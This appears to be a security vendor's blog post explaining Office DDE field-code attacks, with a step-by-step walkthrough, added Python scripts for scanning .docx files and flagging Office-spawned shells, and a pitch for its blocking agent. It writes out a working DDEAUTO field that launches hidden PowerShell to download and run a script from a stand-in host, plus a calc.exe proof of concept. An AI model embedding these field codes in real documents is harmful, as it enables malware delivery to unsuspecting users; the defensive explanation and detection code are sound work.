DDE Attacks: a new way to spread malware using a Microsoft feature

The Dynamic Data Exchange protocol (DDE) is a built-in Microsoft feature that lets applications share and exchange data. In Microsoft Office programs it can be used to request data from another application.
Used maliciously, this feature lets an attacker craft a document that performs malicious actions without any exploit or macro.

This attack method has been reported to Microsoft. Microsoft responded that, as suggested, it is a feature, that no further action will be taken, and that it will be considered as a candidate bug for a next version.

Simple DDE implementation

In the Insert tab, click on “Quick Parts” and then “Field”.

DDE Attack, insert quick parts

Click OK to create a new Formula.

DDE attack, create formula

Right-click on the new formula and choose Toggle Field Codes.

DDE attack, edit formula

Then write the DDE command; in this example only calc.exe will be executed.

{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }

DDE attack, formula calc.exe

Then save the document, and open it.

When the document is opened, a pop-up informs the user that the document may load external files.

DDE attack, pop-up external file

If the user clicks Yes, a new pop-up is displayed to inform the user that cmd.exe will be executed.

DDE attack, pop-up cmd.exe

If the user clicks Yes, calc.exe is started. A pop-up then says that no data can be retrieved, because the program does not return any data over the DDE protocol.

DDE attack, calc.exe
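The field code created above is stored inside the document itself, which means a defender can find it without opening the file in Word. The following Python script is an added example (not code from the original post or from the SAFE Agent product): it unpacks a .docx, reassembles each field instruction from its instrText runs and reports any DDE or DDEAUTO field. The sample document it scans is built in memory from constructed WordprocessingML, and the field instruction it embeds is the calc.exe field code from the walkthrough.

```python
"""Static scan of a .docx for DDE / DDEAUTO field codes.

A .docx is a zip archive.  Word stores a field instruction either in the
w:instr attribute of <w:fldSimple> or as <w:instrText> runs between
<w:fldChar w:fldCharType="begin"/> and <w:fldChar w:fldCharType="end"/>.
Word routinely splits one instruction over several instrText runs, so the
runs are joined per field before matching.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# DDE or DDEAUTO as a whole word anywhere in a field instruction
DDE_FIELD = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def field_instructions(xml_bytes):
    """Yield each complete field instruction in one WordprocessingML part."""
    root = ET.fromstring(xml_bytes)
    depth, buf = 0, []
    for el in root.iter():                      # document order
        if el.tag == W + "fldSimple":
            instr = el.get(W + "instr")
            if instr:
                yield instr
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:                  # outermost field closed
                    yield "".join(buf)
                    buf = []
        elif el.tag == W + "instrText" and depth > 0:
            buf.append(el.text or "")


def scan_docx_bytes(data):
    """Return [(zip member, instruction)] for every DDE/DDEAUTO field found."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            # body, headers, footers, footnotes and comments all live under word/
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                for instr in field_instructions(zf.read(name)):
                    if DDE_FIELD.search(instr):
                        hits.append((name, " ".join(instr.split())))
            except ET.ParseError:
                continue                        # not well-formed XML; skip part
    return hits


def build_sample_docx(instruction):
    """Constructed minimal .docx (sample data, not a real document) holding one
    complex field whose instruction is split over two instrText runs."""
    cut = len(instruction) // 2
    first, second = escape(instruction[:cut]), escape(instruction[cut:])
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>field result</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>' % (W_NS, first, second)
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.'
        'openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>'
    )
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document)
    return out.getvalue()


# The field code from the walkthrough above, and a harmless PAGE field.
DDE_CALC_FIELD = r' DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" '
PAGE_FIELD = " PAGE "

if __name__ == "__main__":
    for label, instr in (("benign", PAGE_FIELD), ("dde", DDE_CALC_FIELD)):
        print(label, scan_docx_bytes(build_sample_docx(instr)))
```

Pass the bytes of a real .docx to scan_docx_bytes to check incoming attachments; the scanner walks every XML part under word/, since a field placed in a header, footer or footnote is processed by Word just like one in the body.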

Cyberattack scenario

To understand how critical this infection method is, let’s look at a real attack execution flow.
In this example, the DDE field starts a PowerShell command line; PowerShell then downloads a program from a server and executes it:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://example.com/my_malware.ps1');powershell -e $e "}

When the document is opened, the user still needs to accept two pop-ups before the attack starts. The PowerShell command line is then executed and downloads the file from the server hosting the final malware. PowerShell executes the malware; if Word or PowerShell is closed, the malware keeps running in the background.

Here is the execution tree of the different processes:

DDE attack, powershell execution

This attack can also be carried out in Outlook, Excel, XML files, etc.
For more attack examples, check this link: https://twitter.com/i/moments/918126999738175489.

How SAFE Agent blocks DDE attacks

Like many Office-based attacks (macros, exploits, links to a program, …), this attack needs to execute an external program to infect the computer.
To block this type of attack, the SAFE Agent restricts access to external programs for all Office applications.

SAFE blocks DDE attacks

When Microsoft Word tries to start cmd.exe from the DDE command, the Agent denies the execution and the DDE attack is successfully blocked.
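Both the execution tree shown in the cyberattack scenario (Word starting cmd.exe, which starts PowerShell) and the rule the Agent applies (an Office application must not launch an external program) come down to one question: is an Office application somewhere in the ancestry of a shell process? The following Python script is an added example, not code from the original post or from the SAFE Agent product. It runs that check over constructed Sysmon-style process-creation events and also shows the same predicate as a simplified allow/deny rule; the rule, the Office and shell name sets, and the sample events are assumptions for illustration, not the product’s actual policy.

```python
"""Process-ancestry check: did an Office application (directly or through an
intermediate cmd.exe) launch a shell?

Process-creation events (Sysmon event 1 style) are modelled as dicts keyed by
pid for brevity; real telemetry should key on a process GUID, since pids are
reused once a process exits.
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample events modelled on the execution tree in the post
# (Word -> cmd.exe -> powershell.exe) plus a benign cmd.exe opened from Explorer.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe"},
]


def basename(image):
    """Lower-cased file name of a Windows image path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Image names from the oldest known ancestor down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def office_spawned_shells(events):
    """Return [(pid, 'ancestor > ... > shell')] for every shell with an Office
    ancestor.  Walking the full chain catches powershell.exe even though its
    direct parent is cmd.exe, not winword.exe."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        chain = ancestry(e["pid"], by_pid)
        if any(name in OFFICE_APPS for name in chain[:-1]):
            findings.append((e["pid"], " > ".join(chain)))
    return findings


def deny_child(parent_image, child_image):
    """Simplified allow/deny rule in the spirit of the behaviour described in
    the post (an assumption, not the product's actual policy): an Office
    application may not start a shell."""
    return basename(parent_image) in OFFICE_APPS and basename(child_image) in SHELLS


if __name__ == "__main__":
    for pid, chain in office_spawned_shells(SAMPLE_EVENTS):
        print("ALERT pid=%d  %s" % (pid, chain))
    print("deny Word->cmd:", deny_child(SAMPLE_EVENTS[1]["image"], SAMPLE_EVENTS[2]["image"]))
```

On the sample events the check flags both cmd.exe and powershell.exe under Word and leaves the cmd.exe started from Explorer alone; the deny rule is the prevention-side version of the same predicate, evaluated at process creation before the child runs.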